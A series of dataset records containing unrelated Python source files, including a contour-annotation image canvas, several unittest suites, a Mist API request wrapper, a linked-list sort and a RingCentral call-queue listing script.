def keydispatch(self, event):\n \"\"\"\n Receives key events and chooses the appropriate action.\n :param event: The key event to process\n \"\"\"\n self.logger.debug(\"User pressed: '{}'\".format(event.keysym))\n if event.keysym == \"Right\":\n self.update_contour_idx(1)\n if event.keysym == \"Left\":\n self.update_contour_idx(-1)\n if event.keysym == \"Down\":\n self.export_contour(self.curr_contour)\n if event.keysym == \"a\":\n self.logger.info(\"Current image: {}\".format(self.image_idx))\n self.update_image_idx(-1)\n if event.keysym == \"d\":\n self.logger.info(\"Current image: {}\".format(self.image_idx))\n self.update_image_idx(1)\n if event.keysym == \"x\":\n self.clear_points()\n if event.keysym == \"c\":\n self.apply_corrections()\n if event.keysym == \"equal\" or event.keysym == \"plus\":\n self.update_thresh(1)\n if event.keysym == \"minus\":\n self.update_thresh(-1)\n if event.keysym == \"r\":\n self.activate_roi()\n\n def activate_roi(self):\n \"\"\"\n Activates the region of interest that the user selected.\n \"\"\"\n img_arr = self.dm.get_image_array(self.image_idx)\n self.roi = cv2.selectROI(\n cv2.cvtColor(np.asarray(img_arr, np.uint8), cv2.COLOR_GRAY2BGR), False\n )\n self.extract_roi(img_arr)\n\n def extract_roi(self, img_arr):\n \"\"\"\n Extracts the ROI from the provided image array and sets it as this canvas's image.\n :param img_arr: An OpenCV image array\n \"\"\"\n r = self.roi\n (x, y, w, h) = r\n if not x == y == w == h == 0:\n self.roi_set = True\n im_crop = img_arr[\n int(r[1]) : int(r[1] + r[3]), int(r[0]) : int(r[0] + r[2])\n ]\n img = Image.fromarray(im_crop)\n self.image_idx %= self.dm.get_num_images()\n self.set_image(img)\n\n def update_image_idx(self, direction):\n \"\"\"\n Updates the image index when a user switches image.\n :param direction: An integer representing whether or not we're moving forward or backward\n \"\"\"\n self.clear_points()\n self.curr_contour = -1\n self.image_idx += direction\n # Use images if we don't have DicomManager\n if self.dm is None:\n path = os.path.join(self.image_folder, self.image_names[self.image_idx])\n self.image_idx %= len(self.image_names)\n self.open_image(path)\n else:\n img_arr = self.dm.get_image_array(self.image_idx)\n if self.roi_set:\n self.extract_roi(img_arr)\n else:\n img = Image.fromarray(img_arr)\n self.image_idx %= self.dm.get_num_images()\n self.set_image(img)\n\n self.parent.update_slice_label(self.image_idx)\n\n def update_contour_idx(self, direction):\n \"\"\"\n Updates the visible contour on user input.\n :param direction: An integer representing whether or not we're incrementing or decrementing\n \"\"\"\n self.logger.debug(\"Current contour: {}\".format(self.curr_contour))\n valid_contour = 0 <= self.curr_contour + direction < len(self.contours) - 1\n if valid_contour:\n self.curr_contour += direction\n self.draw_contour(self.curr_contour)\n\n def open_image(self, path):\n \"\"\"\n Opens the image at the provided path for display.\n :param path: The path to the image.\n \"\"\"\n self.focus()\n self.image_path = path\n new_image = Image.open(self.image_path)\n self.set_image(new_image)\n\n def set_image(self, image):\n \"\"\"\n Sets up a PhotoImage from the provided PIL image so the Canvas can display.\n :param image: An Image\n \"\"\"\n if image is not None:\n self.image = image\n self.photo = ImageTk.PhotoImage(self.image)\n self.width = self.photo.width()\n self.height = self.photo.height()\n thread = threading.Thread(target=self.update_contours, args=())\n thread.start()\n self.create_image(0, 0, anchor=NW, image=self.photo)\n else:\n self.create_image(0, 0, anchor=NW)\n self.config(width=self.width, height=self.height)\n self.parent.config(width=self.width, height=self.height)\n\n def update_thresh(self, delta_thresh):\n \"\"\"\n Update the current contouring threshold.\n :param delta_thresh: Amount and direction to change the contour by.\n \"\"\"\n self.thresh_val += delta_thresh\n self.parent.update_thresh_label(self.thresh_val)\n self.update_contours()\n\n def set_folder(self, folder):\n \"\"\"\n Updates the folder the the Canvas reads Images from.\n :param folder: A path to the folder\n \"\"\"\n self.image_folder = folder\n self.image_names = os.listdir(folder)\n for name in self.image_names:\n if os.path.isdir(os.path.join(folder, name)):\n self.image_names.remove(name)\n\n self.image_names.sort()\n self.open_image(\n os.path.join(self.image_folder, self.image_names[self.image_idx])\n )\n\n def update_contours(self):\n \"\"\"\n Updates the computed contours for the current Image.\n \"\"\"\n self.ready = False\n self.configure(cursor=\"clock\")\n\n self.contours = []\n self.curr_contour = 0\n self.contours = cnt_from_img(self.image, self.thresh_val)\n self.logger.debug(\"Got {} contours\".format(len(self.contours)))\n\n self.ready = True\n self.configure(cursor=\"crosshair red\")\n\n def apply_corrections(self):\n \"\"\"\n Updates the image given the user's inputted corrections and updates the contours.\n \"\"\"\n point_list = self.get_point_list(self.user_points)\n point_list_len = len(point_list)\n im = None\n for i in range(point_list_len):\n j = i + 1\n self.logger.debug(\n \"i: {}, j: {}, point_list_len: {}\".format(i, j, point_list_len)\n )\n if j <= point_list_len - 1:\n self.logger.debug(\n \"Drawing points {} and {}\".format(point_list[i], point_list[j])\n )\n im = np.array(self.image.convert(\"RGB\"))\n\n im = cv2.line(\n im,\n point_list[i],\n point_list[j],\n thickness=2,\n color=(255, 255, 255),\n lineType=cv2.LINE_AA,\n )\n self.image = Image.fromarray(im)\n self.update_contours()\n\n def draw_contour(self, cnt_idx):\n \"\"\"\n Overlays the contour at cnt_idx over the currently displayed Image.\n :param cnt_idx: The contour to draw\n \"\"\"\n if self.ready:\n self.delete(self.contour_point_tag)\n self.delete(self.contour_line_tag)\n self.cnt_points.clear()\n\n for point in self.contours[cnt_idx]:\n point_x = point[0][0]\n point_y = point[0][1]\n self.cnt_points.append(point_x)\n self.cnt_points.append(point_y)\n kwargs = {\n \"tags\": self.contour_line_tag,\n \"width\": 2,\n \"fill\": \"red\",\n \"joinstyle\": \"round\",\n \"capstyle\": \"round\",\n }\n self.itemconfigure(self.contour_line_tag, smooth=1)\n self.create_line(self.cnt_points, kwargs)\n else:\n self.contours_not_ready()\n\n def export_contour(self, cnt_idx):\n \"\"\"\n Exports the current contour profile to file.\n :param cnt_idx: The contour to write\n \"\"\"\n if self.dm:\n new_path = self.dm.get_output_path()\n else:\n # Save the contour to an image by itself\n path_segs = self.image_path.split(\"/\")\n new_path = \"/\".join(path_segs[:-1])\n new_path += \"/saved_contours/\"\n\n time_hash = hashlib.sha1()\n time_hash.update(str(time.time()).encode(\"utf-8\"))\n file_name_hash = \"{}\".format(time_hash.hexdigest()[:10])\n\n scaling_factor = self.dm.get_scaling_factor()\n\n contour_img_path = os.path.join(\n new_path,\n \"{}-{}-{}-{}-{}\".format(\n file_name_hash,\n scaling_factor,\n self.image_idx,\n self.curr_contour,\n self.thresh_val,\n ),\n )\n\n contour_string_path = os.path.join(\n new_path,\n \"{}-{}-{}-{}-{}.txt\".format(\n file_name_hash,\n scaling_factor,\n self.image_idx,\n self.curr_contour,\n self.thresh_val,\n ),\n )\n\n try:\n os.mkdir(new_path)\n except OSError:\n # directory already exists\n pass\n\n thread = threading.Thread(\n target=save_contour,\n args=(self.contours[cnt_idx], self.width, self.height, contour_img_path),\n )\n thread.start()\n\n # Save a background image for more processing\n bkg_save_path = contour_img_path + \"-bkg\"\n thread = threading.Thread(target=save_image, args=(self.image, bkg_save_path))\n thread.start()\n\n file = open(contour_string_path, \"w\")\n np.set_printoptions(threshold=np.nan)\n file.write(np.array2string(self.contours[cnt_idx], separator=\",\"))\n file.close()\n\n @staticmethod\n def contours_not_ready():\n \"\"\"\n Indicator to show the user that the contours aren't computed yet.\n \"\"\"\n filewin = Toplevel()\n label = Label(filewin, text=\"Contours not ready\")\n label.pack()\n\n def create_point(self, event):\n \"\"\"\n Displays and stores the point from the user's mouse click event.\n :param event: The click event for the user's action\n \"\"\"\n self.focus_set()\n self.new_point = True\n self.create_oval(\n event.x,\n event.y,\n event.x + 1,\n event.y + 1,\n outline=\"red\",\n fill=\"red\",\n tag=self.user_point_tag,\n )\n self.user_points.append(event.x)\n self.user_points.append(event.y)\n\n def plot_points(self):\n \"\"\"\n Plots the connections between the points that the user selected.\n \"\"\"\n if self.new_point and len(self.user_points) > 2:\n self.delete(self.user_line_tag)\n self.spline = 0\n self.create_line(\n self.user_points,\n tags=self.user_line_tag,\n width=2,\n fill=\"red\",\n joinstyle=\"round\",\n capstyle=\"round\",\n )\n\n self.new_point = False\n\n def toggle_smoothing(self):\n \"\"\"\n Toggles between smooth and connect the dot plots for the connections between points.\n :return:\n \"\"\"\n if self.spline == 0:\n self.itemconfigure(self.user_line_tag, smooth=1)\n self.spline = 1\n elif self.spline == 1:\n self.itemconfigure(self.user_line_tag, smooth=0)\n self.spline = 0\n\n def clear_points(self):\n \"\"\"\n Clears the points that the user selected.\n \"\"\"\n self.user_points.clear()\n self.delete(self.user_point_tag)\n self.delete(self.user_line_tag)\n\n @staticmethod\n def get_point_list(point_list):\n \"\"\"\n Zips the lists of x and y coordinates.\n :param point_list: The list of points that the user input\n :return: A list of tuples representing x/y pairs\n \"\"\"\n x_list = point_list[0::2]\n y_list = point_list[1::2]\n point_list = list(zip(x_list, y_list))\n return point_list\n","repo_name":"wklock/CAIS","sub_path":"src/View/ResizingImageCanvas.py","file_name":"ResizingImageCanvas.py","file_ext":"py","file_size_in_byte":14436,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"74261303466","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Jun 29 08:24:44 2018\n\n@author: lucas\n\"\"\"\n\nimport unittest\n\nfrom find_combinations import *\n\nclass TestFindCombinations(unittest.TestCase):\n\n def test_empty_destinations(self):\n origen = \"madrid\"\n destinos_posibles = []\n fecha = \"11/08/2018\"\n dias_por_ciudad = 2\n numero_ciudades = 3\n pasajeros = 2\n combinaciones = 5\n combinations_df = getMatrixAndCombinations (origen, destinos_posibles, fecha, dias_por_ciudad, numero_ciudades, pasajeros, combinaciones)\n print(combinations_df)\n self.assertTrue(True, \"No errors returned\")\n\n def test_4destinations_3cities_2days(self):\n origen = \"madrid\"\n destinos_posibles = ['BCN', 'PAR', 'LON', 'BER']\n fecha = \"11/08/2018\"\n dias_por_ciudad = 2\n numero_ciudades = 3\n pasajeros = 2\n combinaciones = 5\n combinations_df = getMatrixAndCombinations (origen, destinos_posibles, fecha, dias_por_ciudad, numero_ciudades, pasajeros, combinaciones)\n print(combinations_df)\n self.assertTrue(True, \"No errors returned\")\n\n def test_fullMatrixNoDestinos_normScoreInput(self):\n #test_full_matrix = fullMatrixNoDestinos(\"madrid\", df_normalized_city_score, \"11/08/2018\", 2, 3, 2)\n #print(test_full_matrix)\n self.assertTrue(True, \"No errors returned\")\n\n def test_get_combinations_4dest_3cities_2days(self):\n origen = \"BCN\"\n destinos_posibles = [\"DUB\", \"VIE\", \"ATH\",\"TLS\"]\n fecha = \"15/07/2018\"\n dias_por_ciudad = 2\n ciudades_minimas_visitar = 3\n pasajeros = 1\n combinaciones = 10\n full_matrix = getMatrixAndCombinations(origen, destinos_posibles, fecha, dias_por_ciudad, ciudades_minimas_visitar, pasajeros, combinaciones)\n print(full_matrix)\n solucion=\"\"\"\n 2 Barcelona [Atenas, Toulouse, Dublín, Barcelona] \n 0 Barcelona [Toulouse, Atenas, Viena, Barcelona] \n 3 Barcelona [Dublín, Viena, Atenas, Barcelona] \n 1 Barcelona [Toulouse, Atenas, Dublín, Barcelona] \n \"\"\"\n self.assertEqual(full_matrix, solucion)\n\n def test_get_combinations_6dest_3cities_2days(self):\n origen = \"BCN\"\n destinos_posibles = [\"LPL\",\"DUB\", \"VIE\", \"ATH\",\"TLS\", \"MPL\"]\n fecha = \"15/08/2018\"\n dias_por_ciudad = 2\n ciudades_minimas_visitar = 3\n pasajeros = 1\n combinaciones = 10\n full_matrix = getMatrixAndCombinations(origen, destinos_posibles, fecha, dias_por_ciudad, ciudades_minimas_visitar, pasajeros, combinaciones)\n full_matrix\n solucion=\"\"\"\n 1 Barcelona [Liverpool, Dublín, Toulouse, Barcelona] \n 4 Barcelona [Viena, Dublín, Liverpool, Barcelona] \n 0 Barcelona [Liverpool, Dublín, Atenas, Barcelona] \n 3 Barcelona [Liverpool, Dublín, Viena, Barcelona] \n 2 Barcelona [Atenas, Viena, Dublín, Barcelona] \n \"\"\"\n self.assertEqual(full_matrix, solucion)\n\n def test_get_combinations_9dest_3cities_2days(self):\n origen = \"BCN\"\n destinos_posibles = [\"BUD\",\"OTP\", \"SOF\", \"PRG\", \"ATH\", \"KRK\", \"WAW\", \"DBK\", \"BTS\"]\n fecha = \"15/08/2018\"\n dias_por_ciudad = 3\n ciudades_minimas_visitar = 3\n pasajeros = 1\n combinaciones = 4\n full_matrix = getMatrixAndCombinations(origen, destinos_posibles, fecha, dias_por_ciudad, ciudades_minimas_visitar, pasajeros, combinaciones)\n full_matrix\n solucion= \"\"\"\n 1 Barcelona [Praga, Varsovia, Bratislava, Gerona] \n 2 Barcelona [Sofía, Budapest, Praga, Barcelona] \n 0 Barcelona [Sofía, Atenas, Bucarest, Barcelona] \n 3 Barcelona [Sofía, Atenas, Budapest, Barcelona]\n \"\"\"\n self.assertEqual(full_matrix, solucion)\n\n def test_get_combinations_8dest_3cities_3days(self):\n origen = \"BCN\"\n destinos_posibles = [\"BUD\",\"OTP\", \"SOF\", \"ATH\", \"KRK\", \"WAW\", \"DBK\", \"BTS\"]\n fecha = \"15/08/2018\"\n dias_por_ciudad = 3\n ciudades_minimas_visitar = 3\n pasajeros = 1\n combinaciones = 10\n full_matrix = getMatrixAndCombinations(origen, destinos_posibles, fecha, dias_por_ciudad, ciudades_minimas_visitar, pasajeros, combinaciones)\n full_matrix\n solucion=\"\"\"\n 2 Barcelona [Sofía, Budapest, Varsovia, Barcelona] \n 0 Barcelona [Sofía, Atenas, Bucarest, Barcelona] \n 3 Barcelona [Sofía, Atenas, Budapest, Barcelona] \n 6 Barcelona [Sofía, Atenas, Bratislava, Gerona] \n 8 Barcelona [Sofía, Atenas, Varsovia, Barcelona] \n 4 Barcelona [Budapest, Sofía, Atenas, Barcelona] \n 1 Barcelona [Varsovia, Bratislava, Atenas, Barcelona] \n 7 Barcelona [Atenas, Sofía, Budapest, Barcelona] \n 9 Barcelona [Bucarest, Atenas, Sofía, Barcelona] \n 5 Barcelona [Sofía, Varsovia, Bratislava, Gerona] \n \"\"\"\n self.assertEqual(full_matrix, solucion)\n\nif __name__ == '__main__':\n unittest.main()","repo_name":"lucaspastorduran/voltioo","sub_path":"tests/test_find_combinatios.py","file_name":"test_find_combinatios.py","file_ext":"py","file_size_in_byte":5183,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"73951800106","text":"import k2\nimport torch\nfrom rnn_lm.dataset import LmDataset, LmDatasetCollate\n\n\ndef main():\n sentences = k2.RaggedTensor(\n [[0, 1, 2], [1, 0, 1], [0, 1], [1, 3, 0, 2, 0], [3], [0, 2, 1]]\n )\n words = k2.RaggedTensor([[3, 6], [2, 8, 9, 3], [5], [5, 6, 7, 8, 9]])\n\n num_sentences = sentences.dim0\n\n sentence_lengths = [0] * num_sentences\n for i in range(num_sentences):\n word_ids = sentences[i]\n\n # NOTE: If word_ids is a tensor with only 1 entry,\n # token_ids is a torch.Tensor\n token_ids = words[word_ids]\n if isinstance(token_ids, k2.RaggedTensor):\n token_ids = token_ids.values\n\n # token_ids is a 1-D tensor containing the BPE tokens\n # of the current sentence\n\n sentence_lengths[i] = token_ids.numel()\n\n sentence_lengths = torch.tensor(sentence_lengths, dtype=torch.int32)\n\n indices = torch.argsort(sentence_lengths, descending=True)\n sentences = sentences[indices.to(torch.int32)]\n sentence_lengths = sentence_lengths[indices]\n\n dataset = LmDataset(\n sentences=sentences,\n words=words,\n sentence_lengths=sentence_lengths,\n max_sent_len=3,\n batch_size=4,\n )\n\n collate_fn = LmDatasetCollate(sos_id=1, eos_id=-1, blank_id=0)\n dataloader = torch.utils.data.DataLoader(\n dataset, batch_size=1, collate_fn=collate_fn\n )\n\n for i in dataloader:\n print(i)\n # I've checked the output manually; the output is as expected.\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"k2-fsa/icefall","sub_path":"icefall/rnn_lm/test_dataset.py","file_name":"test_dataset.py","file_ext":"py","file_size_in_byte":1528,"program_lang":"python","lang":"en","doc_type":"code","stars":640,"dataset":"github-code","pt":"37"} +{"seq_id":"42428128108","text":"import requests\nfrom requests.exceptions import HTTPError\n\nimport json\n\ntry:\n from config import log_level\nexcept:\n log_level = 6\nfinally:\n from .__debug import Console\n console = Console(log_level)\n\n\nclass Req:\n\n def __init__(self):\n self.host = \"\"\n self.session = requests.session()\n self.privileges = \"\"\n \n\n def _url(self, uri):\n \"\"\"Generate the url with the host (in the object) and the uri\n Params: uri\n Return: url\"\"\"\n return \"https://\" + self.host + uri\n\n def _check_authorization(self, method, org_id=\"\", site_id=\"\"):\n return True\n # TODO: current validation may not working in some conditions... Bypassing it\n if method in [\"POST\", \"PUT\", \"DELETE\"]:\n if org_id != \"\":\n for privilige in self.privileges:\n if \"org_id\" in privilige and privilige['org_id'] == org_id:\n if privilige[\"role\"] in [\"write\", \"admin\"]:\n return True\n console.error(\"authorization error\")\n return False\n elif site_id != \"\":\n for privilige in self.privileges:\n if \"site_id\" in privilige and privilige['site_id'] == site_id:\n if privilige[\"role\"] in [\"write\", \"admin\"]:\n return True\n console.error(\"authorization error\")\n return False\n else:\n return True\n\n def _response(self, resp, uri=\"\", multi_pages_result=None):\n if resp.status_code == 200:\n if multi_pages_result == None:\n result = resp.json()\n else: \n result = multi_pages_result\n error = \"\"\n console.debug(\"Response Status Code: %s\" % resp.status_code)\n else:\n result = \"\"\n error = resp.json()\n console.debug(\"Response Status Code: %s\" % resp.status_code)\n console.debug(\"Response: %s\" % error)\n return {\"result\": result, \"status_code\": resp.status_code, \"error\": error, \"uri\":uri}\n\n def mist_get(self, uri, org_id=\"\", site_id=\"\", query={}, page=1, limit=100):\n \"\"\"GET HTTP Request\n Params: uri, HTTP query\n Return: HTTP response\"\"\"\n if self._check_authorization(\"GET\", org_id=org_id, site_id=site_id):\n try:\n url = self._url(uri)\n html_query = \"?\"\n if not query == {}:\n for query_param in query:\n html_query += \"%s=%s&\" %(query_param, query[query_param])\n html_query += \"limit=%s&\" %limit\n html_query += \"page=%s\" %page\n url += html_query\n console.debug(\"Request > GET %s\" % url)\n resp = self.session.get(url)\n resp.raise_for_status()\n except HTTPError as http_err:\n console.error(f'HTTP error occurred: {http_err}') # Python 3.6\n console.error(f'HTTP error description: {resp.json()}')\n except Exception as err:\n console.error(f'Other error occurred: {err}') # Python 3.6\n else: \n if \"X-Page-Limit\" in resp.headers:\n content = resp.json()\n x_page_limit = int(resp.headers[\"X-Page-Limit\"])\n x_page_page = int(resp.headers[\"X-Page-Page\"])\n x_page_total = int(resp.headers[\"X-Page-Total\"])\n if x_page_limit * x_page_page < x_page_total:\n content+=self.mist_get(uri, org_id, site_id, query, page + 1, limit)[\"result\"]\n return self._response(resp, uri, content)\n else: \n return self._response(resp, uri)\n else:\n console.error(\"you're not authenticated yet...\")\n\n def mist_post(self, uri, org_id=\"\", site_id=\"\", body={}):\n \"\"\"POST HTTP Request\n Params: uri, HTTP body\n Return: HTTP response\"\"\"\n if self._check_authorization(\"POST\", org_id=org_id, site_id=site_id):\n try: \n url = self._url(uri)\n headers = {'Content-Type': \"application/json\"}\n console.debug(\"Request > POST %s\" % url)\n console.debug(\"Request body: \\r\\n%s\" % body)\n if type(body) == str:\n resp = self.session.post(url, data=body, headers=headers)\n elif type(body) == dict:\n resp = self.session.post(url, json=body, headers=headers)\n else: \n resp = self.session.post(url, json=body, headers=headers)\n resp.raise_for_status()\n except HTTPError as http_err:\n console.error(f'HTTP error occurred: {http_err}') # Python 3.6\n console.error(f'HTTP error description: {resp.json()}')\n except Exception as err:\n console.error(f'Other error occurred: {err}') # Python 3.6\n else: \n return self._response(resp, uri)\n else:\n console.error(\"you're not authenticated yet...\")\n\n def mist_put(self, uri, org_id=\"\", site_id=\"\", body={}):\n \"\"\"PUT HTTP Request\n Params: uri, HTTP body\n Return: HTTP response\"\"\"\n if self._check_authorization(\"PUT\", org_id=org_id, site_id=site_id):\n try:\n url = self._url(uri)\n console.debug(\"Request > PUT %s\" % url)\n console.debug(\"Request body: \\r\\n%s\" % body)\n if type(body) == str:\n resp = self.session.put(url, data=body)\n elif type(body) == dict:\n resp = self.session.put(url, json=body)\n else: \n resp = self.session.put(url, json=body)\n resp.raise_for_status()\n except HTTPError as http_err:\n console.error(f'HTTP error occurred: {http_err}') # Python 3.6\n console.error(f'HTTP error description: {resp.json()}')\n except Exception as err:\n console.error(f'Other error occurred: {err}') # Python 3.6\n else: \n return self._response(resp, uri)\n\n else:\n console.error(\"you're not authenticated yet...\")\n\n def mist_delete(self, uri, org_id=\"\", site_id=\"\"):\n \"\"\"DELETE HTTP Request\n Params: uri\n Return: HTTP response\"\"\"\n if self._check_authorization(\"DELETE\", org_id=org_id, site_id=site_id):\n try: \n url = self._url(uri)\n console.debug(\"Request > DELETE %s\" % url)\n resp = self.session.delete(url)\n resp.raise_for_status()\n except HTTPError as http_err:\n console.error(f'HTTP error occurred: {http_err}') # Python 3.6\n except Exception as err:\n console.error(f'Other error occurred: {err}') # Python 3.6\n else: \n return self._response(resp, uri)\n else:\n console.error(\"you're not authenticated yet...\")\n\n\n def mist_post_file(self, uri, org_id=\"\", site_id=\"\", files=None):\n \"\"\"POST HTTP Request\n Params: uri, HTTP body\n Return: HTTP response\"\"\"\n if self._check_authorization(\"POST\", org_id=org_id, site_id=site_id):\n try: \n url = self._url(uri)\n console.debug(\"Request > POST %s\" % url)\n resp = self.session.post(url, files=files)\n resp.raise_for_status()\n except HTTPError as http_err:\n console.error(f'HTTP error occurred: {http_err}') # Python 3.6\n console.error(f'HTTP error description: {resp.json()}')\n return resp\n except Exception as err:\n console.error(f'Other error occurred: {err}') # Python 3.6\n else: \n return self._response(resp, uri)\n else:\n console.error(\"you're not authenticated yet...\")\n","repo_name":"cwatson71/Mist-API","sub_path":"mlib/__req.py","file_name":"__req.py","file_ext":"py","file_size_in_byte":8139,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"3974919672","text":"# Definition for singly-linked list.\n# class ListNode:\n# def __init__(self, x):\n# self.val = x\n# self.next = None\n\nclass Solution:\n # @param head, a ListNode\n # @return a ListNode\n def sortList(self, head):\n if not head or not head.next:\n return head\n fast = slow = head\n while fast.next and fast.next.next:\n fast = fast.next.next\n slow = slow.next\n fast = slow.next\n slow.next = None\n left = self.sortList(head)\n right = self.sortList(fast)\n return self.merge(left, right)\n \n def merge(self, l1, l2):\n dummy = ListNode(0)\n if l1 == None: dummy.next = l2\n if l2 == None: dummy.next = l1\n t = dummy\n while l1 != None and l2 != None:\n if l1.val <= l2.val:\n t.next = l1\n l1 = l1.next\n else:\n t.next = l2\n l2 = l2.next\n t = t.next\n while l1 != None:\n t.next = l1\n t = t.next\n l1 = l1.next\n while l2 != None:\n t.next = l2\n t = t.next\n l2 = l2.next\n return dummy.next\n\n\n","repo_name":"wade123/Leetcode_Java_Python","sub_path":"Leetcode_Python/sort_list.py","file_name":"sort_list.py","file_ext":"py","file_size_in_byte":1203,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"11210793777","text":"import unittest\nfrom freezegun import freeze_time\nfrom utils.helpers import get_time, get_test_memo, get_test_memo_user, get_id, get_test_memo_obj\nfrom utils.database_handler import connect_test_database, disconnect_database\nfrom repositories.memo_repository import memo_repository\nfrom repositories.user_repository import user_repository\n\n\n@freeze_time(get_time())\nclass TestMemoRepository(unittest.TestCase):\n\n def setUp(self):\n connect_test_database()\n self.userrepo = user_repository\n self.user = self.userrepo.update(get_test_memo_user())\n self.user_two = self.userrepo.update(\n get_test_memo_user(\"6072d33e3a3c627a49901cd7\", \"memouser2\"))\n self.memorepo = memo_repository\n self.before = self.memorepo.count()\n self.memo = get_test_memo()\n self.saved_memo = self.memorepo.new(self.memo)\n\n def tearDown(self):\n self.userrepo.remove(self.user)\n self.userrepo.remove(self.user_two)\n disconnect_database()\n\n # count\n def test_count_defaults_to_all_memos(self):\n for i in range(1, 4):\n self.memorepo.new(get_test_memo())\n count = self.memorepo.count()\n memos = self.memorepo.get()\n self.assertEqual(count, len(memos))\n\n def test_count_all_memos_works(self):\n before = self.memorepo.count(\"all\")\n self.memorepo.new(get_test_memo())\n after = self.memorepo.count(\"all\")\n self.assertEqual(after, before + 1)\n\n def test_count_all_with_multiple_added_works(self):\n before = self.memorepo.count()\n for i in range(1, 4):\n memo = get_test_memo(i)\n self.memorepo.new(memo)\n after = self.memorepo.count()\n self.assertEqual(after, before + 3)\n\n def test_count_id_returns_only_one(self):\n result = self.memorepo.count('id', self.saved_memo.id)\n self.assertEqual(result, 1)\n\n def test_count_not_valid_id_returns_zero(self):\n result = self.memorepo.count('id', get_id())\n self.assertEqual(result, 0)\n\n def test_count_author_returns_right_amount(self):\n for i in range(3):\n memo = get_test_memo()\n memo[\"author\"] = self.user_two\n self.memorepo.new(memo)\n result = self.memorepo.count(\"author\", self.user_two)\n self.assertEqual(result, 3)\n\n # new - ok\n def test_new_memo_returns_created_memo(self):\n self.assertIsNotNone(self.saved_memo.id)\n self.assertEqual(self.saved_memo.author, self.memo[\"author\"])\n self.assertEqual(self.saved_memo.title, self.memo[\"title\"])\n self.assertEqual(self.saved_memo.content, self.memo[\"content\"])\n self.assertEqual(self.saved_memo.date, self.memo[\"date\"])\n\n def test_new_memo_increases_amount_of_memos(self):\n after = self.memorepo.count()\n self.assertEqual(after, self.before+1)\n\n # update\n def test_update_memo_updates_values(self):\n self.saved_memo.title = \"Updated title\"\n self.saved_memo.content = \"Updated content\"\n updated_memo = self.memorepo.update(self.saved_memo)\n self.assertEqual(self.saved_memo.title, updated_memo.title)\n self.assertEqual(self.saved_memo.content, updated_memo.content)\n self.assertEqual(self.saved_memo.author, updated_memo.author)\n\n def test_update_memo_updates_values_to_db(self):\n self.saved_memo.title = \"Updated title\"\n self.saved_memo.content = \"Updated content\"\n updated_memo = self.memorepo.update(self.saved_memo)\n memo_in_db = self.memorepo.get('id', self.saved_memo.id)\n self.assertEqual(memo_in_db, updated_memo)\n\n # remove\n def test_remove_memo_removes_from_database(self):\n result = self.memorepo.remove(self.saved_memo)\n self.assertEqual(self.memorepo.count(), self.before)\n self.assertTrue(result)\n\n def test_remove_memo_returns_false_if_not_valid_memo(self):\n not_valid_memo = get_test_memo_obj()\n result = self.memorepo.remove(not_valid_memo)\n self.assertFalse(result)\n\n def test_remove_memo_with_none_memo_returns_false(self):\n result = self.memorepo.remove(None)\n self.assertFalse(result)\n\n # get\n def test_get_defaults_get_all(self):\n for i in range(1, 4):\n self.memorepo.new(get_test_memo(i))\n count = self.memorepo.count()\n memos = self.memorepo.get()\n self.assertEqual(len(memos), count)\n\n def test_get_all_returns_list_of_memos(self):\n added_memos = []\n added_memos.append(self.saved_memo)\n for i in range(1, 4):\n added_memos.append(self.memorepo.new(get_test_memo(i)))\n memos = self.memorepo.get(\"all\")\n for i in range(len(memos)):\n self.assertEqual(memos[i], added_memos[i])\n\n def test_get_id_returns_memo_with_same_id(self):\n queried_memo = self.memorepo.get('id', self.saved_memo.id)\n self.assertEqual(queried_memo, self.saved_memo)\n self.assertEqual(queried_memo.id, self.saved_memo.id)\n self.assertEqual(queried_memo.title, self.saved_memo.title)\n self.assertEqual(queried_memo.content, self.saved_memo.content)\n\n def test_get_unvalid_id(self):\n queried_memo = self.memorepo.get('id', get_id())\n self.assertIsNone(queried_memo)\n\n def test_get_author_id_with_author_works(self):\n user_two_memo = get_test_memo()\n user_two_memo[\"author\"] = self.user_two\n self.memorepo.new(user_two_memo)\n queried_memos = self.memorepo.get(\n \"author\", self.saved_memo.author)\n self.assertEqual(len(queried_memos), 1)\n queried_memo = queried_memos[0]\n self.assertEqual(queried_memo.id, self.saved_memo.id)\n self.assertEqual(queried_memo.author, self.saved_memo.author)\n","repo_name":"FinThunderstorm/ohte","sub_path":"src/tests/repositories/test_memorepository.py","file_name":"test_memorepository.py","file_ext":"py","file_size_in_byte":5784,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"72539776106","text":"#!/usr/bin/python\n\n# You get the environment parameters from your \n# application dashbord in your developer account \n# https://developers.ringcentral.com\n\nimport os\nimport sys\n \nfrom dotenv import load_dotenv\nfrom ringcentral import SDK\nload_dotenv()\n\nrcsdk = SDK( os.environ.get('RC_CLIENT_ID'),\n os.environ.get('RC_CLIENT_SECRET'),\n os.environ.get('RC_SERVER_URL') )\nplatform = rcsdk.platform()\ntry:\n platform.login( jwt=os.environ.get('RC_JWT') )\nexcept Exception as e:\n sys.exit(\"Unable to authenticate to platform: \" + str(e))\n\ntry:\n resp = platform.get('/restapi/v1.0/account/~/call-queues')\n records = resp.json().records\n if len(records) == 0:\n print( f'No call queues were found for the current account' )\n else:\n for r in records:\n print( f'Call queue: name = {r[\"name\"]}, extension = {r[\"extension\"]}' )\n\nexcept ApiException as e:\n sys.exit( e )\nelse:\n sys.exit( 0 )\n","repo_name":"ringcentral/ringcentral-api-docs","sub_path":"code-samples/voice/call-queues-read-call-queues.py","file_name":"call-queues-read-call-queues.py","file_ext":"py","file_size_in_byte":947,"program_lang":"python","lang":"en","doc_type":"code","stars":32,"dataset":"github-code","pt":"37"} +{"seq_id":"10497604931","text":"from django.urls import path\n\nfrom .views import (ArticlesListCreateAPIView, LikeArticlesView, ReportArticlesView,\n GetArticleBySlugApiView, RetrieveUpdateArticleByIdApiView,\n RateCreateAPIView, RateRetrieveAPIView,\n )\n\nfrom .share_articles import (\n ShareArticleViaEmailAPIView,\n ShareArticleViaFacebookAPIView,\n ShareArticleViaTwitterAPIView,\n)\n\n\nlist_create_articles = path(\n '', ArticlesListCreateAPIView.as_view(), 